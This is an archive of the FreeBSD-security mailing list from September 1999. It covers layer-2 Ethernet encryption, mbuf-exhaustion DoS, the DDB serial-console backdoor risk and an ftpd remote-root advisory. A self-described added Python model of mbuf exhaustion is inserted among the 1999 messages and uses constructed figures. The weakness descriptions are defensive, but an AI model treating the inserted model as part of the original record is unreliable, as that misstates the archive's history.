++++ FreeBSD(98) 2.2.8: Rev. 02 available!     +==========================+

From owner-freebsd-security Tue Sep 7 3:38:24 1999
Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id A122214E48 for ; Tue, 7 Sep 1999 03:38:21 -0700 (PDT) (envelope-from dmp@aracnet.com)
Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id DAA10341; Tue, 7 Sep 1999 03:34:55 -0700 (PDT)
From: dmp@aracnet.com
Message-ID: <37D4EADE.6F1506F4@aracnet.com>
Date: Tue, 07 Sep 1999 03:37:18 -0700
X-Mailer: Mozilla 4.6 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: "Rodney W. Grimes"
Cc: ck@adsu.bellsouth.com, bryan@valiant.cis.hcc.cc.il.us, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <199909070904.CAA05294@gndrsh.dnsmgr.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

"Rodney W. Grimes" wrote:
> > What it comes down to is a hardware-based means of encrypting
> > ethernet traffic in a way that allows only the MAC address to be
> > seen. I won't go into much detail about the network in question.
> > I will say that an unencrypted MAC address is required, and that only
> > the source and destination computers need know the unencrypted
> > contents of layers 3 and higher.
>
> This can be done, even in software, though it is not going to be either
> fast due to DES or any other cryptographic overhead or easy to do with
> any off the shelf software due to mods required.

Getting software that could do the work isn't a problem. Running that
software on computers that don't have good FP performance is.

> It might be easier to do this in hardware, just like was done on the
> Wavelan stuff, only modify the crypt/decrypt engine so that it skips
> the MAC address bytes. You could even glue this into a modified NIC
> card between the NIC chip and the MII with a custom ASIC. You'd need
> a way to program the keys, and a few other details, but not that hard
> to do.

This was pretty much the idea I had come up with. I had my eye on a
cypher chip and a socketed ROM that would let you change the keys for
the NIC just by swapping ROMs. Chassis intrusion is a small risk in
this case.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 6:41:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 03A3614F49 for ; Tue, 7 Sep 1999 06:41:21 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id JAA11485; Tue, 7 Sep 1999 09:39:17 -0400 (EDT) (envelope-from wollman) Date: Tue, 7 Sep 1999 09:39:17 -0400 (EDT) From: Garrett Wollman Message-Id: <199909071339.JAA11485@khavrinen.lcs.mit.edu> To: dmp@aracnet.com Cc: ks@itp.ac.ru, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D4BCC2.34AFAE9D@aracnet.com> References: <37D4BCC2.34AFAE9D@aracnet.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < I have two problems. The first is that EM emissions on UTP allows > one to monitor all traffic on that cable. Use fiber NICs. > The second is that a > sniffer run on an authorized machine will be able to see the source > and destination IP and port of all IP traffic on it's segment. Use a good switch and hard-wire the bridge table. -GAWollman -- Garrett A. 
Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 6:43: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from SLIS-TWO.lis.fsu.edu (SLIS-TWO.lis.fsu.edu [128.186.45.2]) by hub.freebsd.org (Postfix) with ESMTP id CD2C114D70 for ; Tue, 7 Sep 1999 06:42:51 -0700 (PDT) (envelope-from david@SLIS-TWO.lis.fsu.edu) Received: from localhost (david@localhost) by SLIS-TWO.lis.fsu.edu (8.8.5/8.8.5) with SMTP id JAA00852; Tue, 7 Sep 1999 09:30:58 -0400 (EDT) Date: Tue, 7 Sep 1999 09:30:57 -0400 (EDT) From: David Miner To: dmp@aracnet.com Cc: "Rodney W. Grimes" , ck@adsu.bellsouth.com, bryan@valiant.cis.hcc.cc.il.us, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D4EADE.6F1506F4@aracnet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In regards to the other problem of EM from the UTP, have your uses given thought to running the lines through shielded conduit. Are they running TEMPEST tested boxes for the problem of radiation from the monitors? Is each end in a shielded, grounded room? If they are that parinoid about a sniffer from an authorized machine, they should be worried about the radiation of unecrypted information after the data has been passed to the destination machine. Regards, David --------------------------------------------------------------------- David R. 
Miner miner@lis.fsu.edu Systems Manager voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 6:55:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from backup.af.speednet.com.au (af.speednet.com.au [202.135.206.244]) by hub.freebsd.org (Postfix) with ESMTP id 3EC8215582 for ; Tue, 7 Sep 1999 06:55:46 -0700 (PDT) (envelope-from andyf@speednet.com.au) Received: from localhost (localhost [127.0.0.1]) by backup.af.speednet.com.au (8.9.3/8.9.3) with ESMTP id XAA22866; Tue, 7 Sep 1999 23:52:27 +1000 (EST) (envelope-from andyf@speednet.com.au) Date: Tue, 7 Sep 1999 23:52:27 +1000 (EST) From: Andy Farkas X-Sender: andyf@localhost To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2 Sep 1999, Dag-Erling Smorgrav wrote: > > If you have it set so that it does SUID for cgi and runs it as the user or > > uses the users accounting limits, it won't work.. and yes, you should set > > some sensible apache limits per user on that stuff, I know its possible. > > Apache's suEXEC wrapper doesn't enforce user limits. See ports/13606. 
>
> DES
> --
> Dag-Erling Smorgrav - des@flood.ping.uio.no
>

--
:{ andyf@speednet.com.au
Andy Farkas
System Administrator
Speednet Communications
http://www.speednet.com.au/

From owner-freebsd-security Tue Sep 7 07:58:49 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 774E915641; Tue, 7 Sep 1999 07:58:44 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id HAA20887; Tue, 7 Sep 1999 07:58:30 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id HAA02575; Tue, 7 Sep 1999 07:58:29 -0700 (PDT)
Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id HAA00426; Tue, 7 Sep 1999 07:58:28 -0700 (PDT)
From: Don Lewis
Message-Id: <199909071458.HAA00426@salsa.gv.tsc.tdk.com>
Date: Tue, 7 Sep 1999 07:58:28 -0700
In-Reply-To: Matthew Dillon "Re: mbuf shortage situations" (Sep 5, 9:18pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Matthew Dillon , Bosko Milekic
Subject: Re: mbuf shortage situations
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sep 5, 9:18pm, Matthew Dillon wrote:
} Subject: Re: mbuf shortage situations
} : The only reason that I see for which we would actually panic() in
} :this situation (as opposed to suffer the packet loss) is if we get to the
} :point where we're losing packets because some script kid starts up
} :something that will eat up sockbuf space and continuously fork, then we
} :would lose all remote access to the machine in question (since all packets
} :would be dropped) and we wouldn't really mind a panic() for obvious
} :practical reasons.

Well, I really would mind the panic().

} : In any case, I, personally, would prefer to suffer packet loss as
} :opposed to a panic (especially now that Brian is in the process of writing
} :diffs that will allow us to limit socket buffer space per UID through
} :login.conf!)
} : Having MGET store that null (e.g. fail as opposed to panic) on a
} :M_WAIT seems fairly easy to fix, and would probably require some patching
} :that would ensure that the packet loss is handled relatively 'cleanly'
} :(probably some debugging), but I wouldn't mind doing this. However, I'd
} :like to know if there are objections to doing this or, in fact, if there
} :are any suggestions on how to handle mbuf shortage situations (aside from
} :just limiting -- although limiting is in itself a good solution and I'm
} :glad that Brian F. is working on that).

At least historically most of the panics have been caused by the code not properly checking the result of the MGET and dereferencing a NULL pointer. Any of those that are still in the code need to be fixed.

My impression is that for reasonably recent versions of FreeBSD this attack doesn't panic the machine but just wedges the network system due to mbuf exhaustion. The problem is that if you get to this point you're basically hosed. It's OK to toss packets that you receive from the net as long as you haven't sent an ack for them, toss outgoing UDP packets, and block writes to stream sockets, but you can't toss acked TCP packets that you've received, or the data queued to a stream socket by write(). This particular attack does the latter, so the only possible fix is to prevent all the mbufs from being consumed by it in the first place.

} The issue is basically having someone find the time to figure out
} how to gracefully unwind various pieces of network code when an
} mbuf cannot be allocated. Once that is done, the panic can be
} turned into a (rate-limited) printf.

That won't help. All that does is keep a root spinning on a failed syscall instead of blocking on MGET when he's trying to log in to kill the errant process.

From owner-freebsd-security Tue Sep 7 08:27:59 1999
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id C95C214C28 for ; Tue, 7 Sep 1999 08:27:53 -0700 (PDT) (envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (1685 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 7 Sep 1999 10:21:58 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7)
Date: Tue, 7 Sep 1999 10:21:50 -0500 (CDT)
From: James Wyatt
To: David Miner
Cc: dmp@aracnet.com, "Rodney W. Grimes" , ck@adsu.bellsouth.com, bryan@valiant.cis.hcc.cc.il.us, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

There are nice 10bT to fiber (fibre in the UK) converters in the BlackBox catalog (catalogue). You could put these oh-so-close to the router or switch in the equipment space - maybe even braid the 10bT cables to confuse any listeners there. Then 10bF cards in the machines ensure no EMI emitted in the unsecure area. - Jy@

On Tue, 7 Sep 1999, David Miner wrote:
> In regards to the other problem of EM from the UTP, have your users given
> thought to running the lines through shielded conduit? Are they running
> TEMPEST tested boxes for the problem of radiation from the monitors? Is
> each end in a shielded, grounded room?
> If they are that paranoid about a
> sniffer from an authorized machine, they should be worried about the
> radiation of unencrypted information after the data has been passed to the
> destination machine.

From owner-freebsd-security Tue Sep 7 08:59:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 5C88414D73; Tue, 7 Sep 1999 08:59:43 -0700 (PDT) (envelope-from dillon@apollo.backplane.com)
Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id IAA81847; Tue, 7 Sep 1999 08:58:45 -0700 (PDT) (envelope-from dillon)
Date: Tue, 7 Sep 1999 08:58:45 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199909071558.IAA81847@apollo.backplane.com>
To: Nick Hibma
Cc: Greg Black , Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel
References:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

: > generated, DDB is the only way to figure out what is going on.
: > securelevel is a mechanism which attempts to guarantee data security,
: > at least to a degree. These two items do not clash.
: >
:
:Anyway, as soon as you can physically access the PC, you'd lose anyway,
:independent of whether you can go into DDB to do things. You can reboot,
:boot a floppy. Yes you can do something about those things, but only to
:a limited extent.
:
:Nick

I wasn't really thinking of the console-on-vty case. I was thinking of the console-on-serial-port case. When you have a rack of PC's you usually hang the console off a serial port and throw it into a portmaster or another machine w/ a multi-port card in it. There are two reasons for doing this. First in order to be able to log all messages sent to the console on a separate box, and second to be able to perform maintenance on the machines & deal with panics, lockups, and other situations for which DDB might be useful without having to haul the card with the video monitor and keyboard physically over to the machine. This also comes in useful when dealing with network attacks that make it impossible to log into a machine the normal way.

But, unfortunately, putting the console on a serial port creates vulnerabilities when DDB is enabled. You are, essentially, creating an unintentional backdoor into the system. Hence the problem.

-Matt
Matthew Dillon

From owner-freebsd-security Tue Sep 7 09:01:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from grogan.caprice.mb.ca (caprice.mb.ca [205.200.216.3]) by hub.freebsd.org (Postfix) with ESMTP id 4C40D15569 for ; Tue, 7 Sep 1999 09:01:15 -0700 (PDT) (envelope-from grub@grub.net)
Received: from grub.net (home.grub.net [207.161.189.109]) by grogan.caprice.mb.ca (8.9.2/8.9.2) with ESMTP id JAA57230; Tue, 7 Sep 1999 09:36:27 -0500 (CDT) (envelope-from grub@grub.net)
Message-ID: <37D38AB0.D4871A@grub.net>
Date: Mon, 06 Sep 1999 09:34:40 +0000
From: grub
Organization: GRUB.NET: "Purveyors of Fine Crud"
X-Mailer: Mozilla 4.61 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: dmp@aracnet.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <37D4CA23.6A64FCAC@aracnet.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

dmp@aracnet.com wrote:
[snip]
> In order:
>
> A machine on the network can't see any other machine other than its
> firewall interface until the DC authorizes its presence.
>
> Managed switches aren't used, we haven't found one that can provide
> a high enough level of security.
>
> The server rooms already are locked.

This is an interesting thread but I have a solution: "Sneaker Net" :)

From owner-freebsd-security Tue Sep 7 09:09:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id E2E6214D73; Tue, 7 Sep 1999 09:09:15 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id SAA30467; Tue, 7 Sep 1999 18:07:40 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Matthew Dillon
Cc: Nick Hibma , Greg Black , Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel
In-reply-to: Your message of "Tue, 07 Sep 1999 08:58:45 PDT." <199909071558.IAA81847@apollo.backplane.com>
Date: Tue, 07 Sep 1999 18:07:40 +0200
Message-ID: <30465.936720460@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> But, unfortunately, putting the console on a serial port creates
> vulnerabilities when DDB is enabled. You are, essentially, creating
> an unintentional backdoor into the system. Hence the problem.

ports/*/conserver is your friend!

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!
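Don Lewis's message above on mbuf shortage situations makes two points: code that takes an mbuf must check for a failed allocation instead of dereferencing NULL, and once one user can queue enough data to exhaust the pool, failing the allocation gracefully no longer helps, so the real fix is to stop that user consuming the pool in the first place (the per-UID socket-buffer limit through login.conf mentioned in the text he quotes). The following is an added user-space model of those two points written for this digest; it is not FreeBSD kernel code and not anyone's posted code, and the names (MbufPool, SocketBufferAccounting, sbreserve, run_scenario), the cluster size and all limits are constructed for the illustration:

```python
"""Model of mbuf exhaustion and a per-UID socket-buffer limit.

Added illustration for the "mbuf shortage situations" discussion. It is a
user-space model, not FreeBSD kernel code; the class and function names are
hypothetical and every number is constructed.
"""
from dataclasses import dataclass

MCLBYTES = 2048      # cluster size assumed for the model
ROOT_UID = 0
USER_UID = 1001


class MbufPool:
    """Fixed pool of clusters. mget() behaves like an allocation that is
    allowed to fail: it returns None on shortage rather than panicking."""

    def __init__(self, nmbclusters):
        self.free = nmbclusters
        self.shortages = 0

    def mget(self):
        if self.free == 0:
            self.shortages += 1          # record the shortage; caller must check for None
            return None
        self.free -= 1
        return bytearray(MCLBYTES)

    def mfree(self, m):
        self.free += 1


@dataclass
class UidInfo:
    sbsize: int = 0      # bytes of socket-buffer space charged to this uid


class SocketBufferAccounting:
    """Charges socket-buffer space to the owning uid and refuses reservations
    past that uid's limit before any cluster is taken from the shared pool."""

    def __init__(self, pool, limits):
        self.pool = pool
        self.limits = limits     # uid -> byte limit, None meaning unlimited
        self.uids = {}

    def sbreserve(self, uid, nbytes):
        ui = self.uids.setdefault(uid, UidInfo())
        limit = self.limits.get(uid)
        if limit is not None and ui.sbsize + nbytes > limit:
            return None                      # over quota: refuse, pool untouched
        bufs = []
        for _ in range((nbytes + MCLBYTES - 1) // MCLBYTES):
            m = self.pool.mget()
            if m is None:                    # shortage: unwind and fail cleanly
                for b in bufs:
                    self.pool.mfree(b)
                return None
            bufs.append(m)
        ui.sbsize += nbytes
        return bufs

    def sbrelease(self, uid, bufs, nbytes):
        for b in bufs:
            self.pool.mfree(b)
        self.uids[uid].sbsize -= nbytes


def run_scenario(user_limit, nmbclusters=64, chunk=16384):
    """One unprivileged uid keeps opening sockets and filling their buffers;
    then root tries to get a buffer (standing in for the login that would
    kill the offending process)."""
    pool = MbufPool(nmbclusters)
    acct = SocketBufferAccounting(pool, {USER_UID: user_limit, ROOT_UID: None})
    held = []
    while len(held) < 1000:
        bufs = acct.sbreserve(USER_UID, chunk)
        if bufs is None:
            break
        held.append(bufs)
    root_ok = acct.sbreserve(ROOT_UID, chunk) is not None
    return {
        "user_reservations": len(held),
        "root_ok": root_ok,
        "shortages": pool.shortages,
        "free_clusters": pool.free,
    }


if __name__ == "__main__":
    print("unlimited:     ", run_scenario(None))
    print("64 KiB per uid:", run_scenario(64 * 1024))
```

With an unlimited user the pool goes to zero, so the later root reservation fails; with a 64 KiB per-uid limit the same user is refused at the quota before a cluster is taken and root still gets its buffer. The model charges bytes to the uid before touching the pool, which is the ordering that keeps one uid's consumption bounded however many sockets or processes it has.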
From owner-freebsd-security Tue Sep 7 09:22:40 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 316FD15634; Tue, 7 Sep 1999 09:22:23 -0700 (PDT) (envelope-from security-officer@freebsd.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id KAA40749; Tue, 7 Sep 1999 10:20:53 -0600 (MDT) (envelope-from security-officer@freebsd.org)
Received: (from root@localhost) by harmony.village.org (8.9.3/8.8.3) id KAA13314; Tue, 7 Sep 1999 10:20:19 -0600 (MDT)
Date: Tue, 7 Sep 1999 10:20:19 -0600 (MDT)
Message-Id: <199909071620.KAA13314@harmony.village.org>
From: FreeBSD Security Officer
To: security-officer@freebsd.org
Subject: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd
Reply-To: security-officer@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-99:03                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          Two ftp daemons in ports vulnerable to attack.

Category:       ports
Module:         wu-ftpd and proftpd
Announced:      1999-09-05
Affects:        FreeBSD 3.2 (and earlier)
                FreeBSD-current before the correction date.
Corrected:      FreeBSD-3.3 RELEASE
                FreeBSD-current as of 1999/08/30
FreeBSD only:   NO
Patches:        NONE

I.   Background

wuftpd and proftpd have a flaw which can lead to a remote root compromise. They are both vulnerable since they are both based on a code base that is vulnerable.

II.  Problem Description

Remote users can gain root via a buffer overflow.

III. Impact

Remote users can gain root.

IV.  Workaround

Disable the ftp daemon until you can upgrade your system.

V.   Solution

Upgrade your wu-ftpd or proftpd ports to the most recent versions (any version after August 30, 1999 is not impacted by this problem). If you are running non-port versions, you should verify that your version is not vulnerable or upgrade to using the ports version of these programs.

=============================================================================
FreeBSD, Inc.

Web Site:                       http://www.freebsd.org/
Confidential contacts:          security-officer@freebsd.org
Security notifications:         security-notifications@freebsd.org
Security public discussion:     freebsd-security@freebsd.org
PGP Key:                        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc

Notice: Any patches in this document may not apply cleanly due to
        modifications caused by digital signature or mailer software.
        Please reference the URL listed at the top of this document
        for original copies of all patches if necessary.
=============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBN9MsfFUuHi5z0oilAQHKYQP/SGjOSQ8Ph8VqLtpStVOl6L0ocoYKv59R
B6ow00bchILYV7qlsIGFhwMITZxZH0aGd0EAxwfFKwfvu36zSzAvu1rGrFCjT5Xd
zefzAQUgj1/rWm3Jp1DxMd2BKCJrvTCOjKngIbbA2tH3AZ9xHiwefpqtIHVPikmy
XR9gpyqCj/E=
=dyHS
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Sep 7 12:28:02 1999
Delivered-To: freebsd-security@freebsd.org
Received: from metriclient-1.uoregon.edu (metriclient-1.uoregon.edu [128.223.172.1]) by hub.freebsd.org (Postfix) with ESMTP id DCF84155FD for ; Tue, 7 Sep 1999 12:27:57 -0700 (PDT) (envelope-from gurney_j@efn.org)
Received: (from jmg@localhost) by metriclient-1.uoregon.edu (8.9.1/8.8.7) id MAA10951; Tue, 7 Sep 1999 12:26:21 -0700 (PDT)
Message-ID: <19990907122621.30662@hydrogen.fircrest.net>
Date: Tue, 7 Sep 1999 12:26:21 -0700
From: John-Mark Gurney
To:
 Sheldon Hearn
Cc: sthaug@nethelp.no, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG
Subject: Re: Tracing open ports on FreeBSD
References: <36622.936445305@verdi.nethelp.no> <28018.936617908@axl.noc.iafrica.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.69
In-Reply-To: <28018.936617908@axl.noc.iafrica.com>; from Sheldon Hearn on Mon, Sep 06, 1999 at 01:38:28PM +0200
Reply-To: John-Mark Gurney
Organization: Cu Networking
X-Operating-System: FreeBSD 3.0-RELEASE i386
X-PGP-Fingerprint: B7 EC EF F8 AE ED A7 31 96 7A 22 B3 D8 56 36 F4
X-Files: The truth is out there
X-URL: http://resnet.uoregon.edu/~gurney_j/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Sheldon Hearn scribbled this message on Sep 6:
> On Sat, 04 Sep 1999 13:41:45 +0200, sthaug@nethelp.no wrote:
>
> > You're probably using ssh with X11 forwarding. If you use the
> > 'sockstat' program you'll find that sshd is listening to those ports.
>
> This is the third time I've seen someone try to use netstat to figure
> out who's listening to what. Do you think an xref to sockstat would be
> completely inappropriate in the netstat(1) manpage?

no, but we should include a reference to fstat... you can track down who had a udp socket open, but for some reason the addresses on my 3.0-R box for tcp streams output by netstat don't agree w/ any of the addresses that exist in the fstat output... looks like I should extend the description of -A to include a blurb about identifying processes which own a socket/stream...

--
  John-Mark Gurney                          Voice: +1 541 684 8449
  Cu Networking                             P.O. Box 5693, 97405

  "The soul contains in itself the event that shall presently befall it.
  The event is only the actualizing of its thought."
                                              -- Ralph Waldo Emerson

From owner-freebsd-security Tue Sep 7 12:42:41 1999
Delivered-To: freebsd-security@freebsd.org
Received: from charlotte.geac.com (charlotte.geac.com [208.144.226.130]) by hub.freebsd.org (Postfix) with SMTP id 05E1114CF5 for ; Tue, 7 Sep 1999 12:42:38 -0700 (PDT) (envelope-from n.spence@geac.com)
Received: (qmail 138 invoked from network); 7 Sep 1999 19:38:33 -0000
Received: from aramis.geac.com (HELO b21bis.clsi.us.geac.com) (208.144.226.1) by charlotte.geac.com with SMTP; 7 Sep 1999 19:38:33 -0000
Received: (qmail 15105 invoked from network); 7 Sep 1999 19:38:26 -0000
Received: from exchange.eci.us.geac.com (HELO ilpostino.eci.us.geac.com) (192.168.70.13) by b21bis.us.geac.com with SMTP; 7 Sep 1999 19:38:26 -0000
Received: by exchange.eci.us.geac.com with Internet Mail Service (5.5.1960.3) id ; Tue, 7 Sep 1999 12:41:02 -0700
Message-ID: <85D42D7EE2DAD2119CD400A0C9E1004F64F69A@exchange.eci.us.geac.com>
From: Nikolaus Spence
To: 'dmp@aracnet.com'
Cc: freebsd-security@freebsd.org
Subject: RE: Layer 2 ethernet encryption?
Date: Tue, 7 Sep 1999 12:41:01 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.1960.3)
Content-Type: text/plain; charset="utf-8"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If you aren't using IP based routing then aren't your packets going to be encapsulated already? how ARE you routing your packets???

Nikolaus

-----Original Message-----
From: dmp@aracnet.com [mailto:dmp@aracnet.com]
Sent: Monday, September 06, 1999 11:06 PM
To: Gary Palmer
Cc: freebsd-security@freebsd.org
Subject: Re: Layer 2 ethernet encryption?

Gary Palmer wrote:
>
> dmp@aracnet.com wrote in message ID
> <37D496A5.A0576E0F@aracnet.com>:
> > Is it possible to encrypt ethernet packets so that all layers above
> > layer 2 would be encrypted? The idea I had was to make a device that
> > could defeat a TCP sniffer by encrypting the IP headers. Is this
> > doable? Viable? A reinvention of the wheel?
>
> How would you route the traffic? No routers would be able to pass the
> traffic.

The network in question doesn't use IP-based routing.

> If you are doing this for a local LAN, I suggest you have bigger
> problems :)

You're right, I do have bigger problems. Like deep paranoia among the users of the LAN.

From owner-freebsd-security Tue Sep 7 19:21:03 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mta2.snfc21.pbi.net (mta2.snfc21.pbi.net [206.13.28.123]) by hub.freebsd.org (Postfix) with ESMTP id 4308714EE6 for ; Tue, 7 Sep 1999 19:21:00 -0700 (PDT) (envelope-from madscientist@thegrid.net)
Received: from remus (adsl-63-193-246-169.dsl.snfc21.pacbell.net [63.193.246.169]) by mta2.snfc21.pbi.net (8.9.3/8.9.3) with SMTP id TAA29356; Tue, 7 Sep 1999 19:18:40 -0700 (PDT)
Message-Id: <4.1.19990907190442.0096ada0@mail.thegrid.net>
X-Sender: i289861@mail.thegrid.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Tue, 07 Sep 1999 19:19:14 -0700
To: dmp@aracnet.com, ks@itp.ac.ru
From: The Mad Scientist
Subject: Re: Layer 2 ethernet encryption?
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <37D4BCC2.34AFAE9D@aracnet.com>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 12:20 AM 9/7/99 -0700, dmp@aracnet.com wrote:
>"Sergey S. Kosyakov" wrote:
>> On 07-Sep-99 dmp@aracnet.com wrote:
>>> "Sergey S. Kosyakov" wrote:
>>>> On 07-Sep-99 dmp@aracnet.com wrote:
>I have two problems. The first is that EM emissions on UTP allows
>one to monitor all traffic on that cable. The second is that a
>sniffer run on an authorized machine will be able to see the source
>and destination IP and port of all IP traffic on its segment.
>
>I want to fix both problems. Encrypting everything above layer 2
>does this. The only determinable aspects of the packets would be
>the source and destination MAC addresses, relatively sufficient
>security given the security policy and topology of the network in
>question.
I do not claim to understand driver writing, but what about ripping out the code that puts the NIC into promiscuous mode? You would have to modify the code that allows the driver to change its MAC address, probably. But if you have good network monitors, you should be able to detect a machine that is pretending to be someone else pretty quickly. It's not encryption, but if you're blind, you can't read the written word. It doesn't solve your EM problems either.

'Course, I guess any user with half a brain could go out and get the original driver and put it in place -- this being an open source solution. So, I guess it's not such a good idea after all. I'll send this anyway, in case it starts people thinking. Please redirect flames to /dev/null.

Dean

From owner-freebsd-security Tue Sep 7 23:34:44 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 2CB5915A8D for ; Tue, 7 Sep 1999 23:34:37 -0700 (PDT) (envelope-from dmp@aracnet.com)
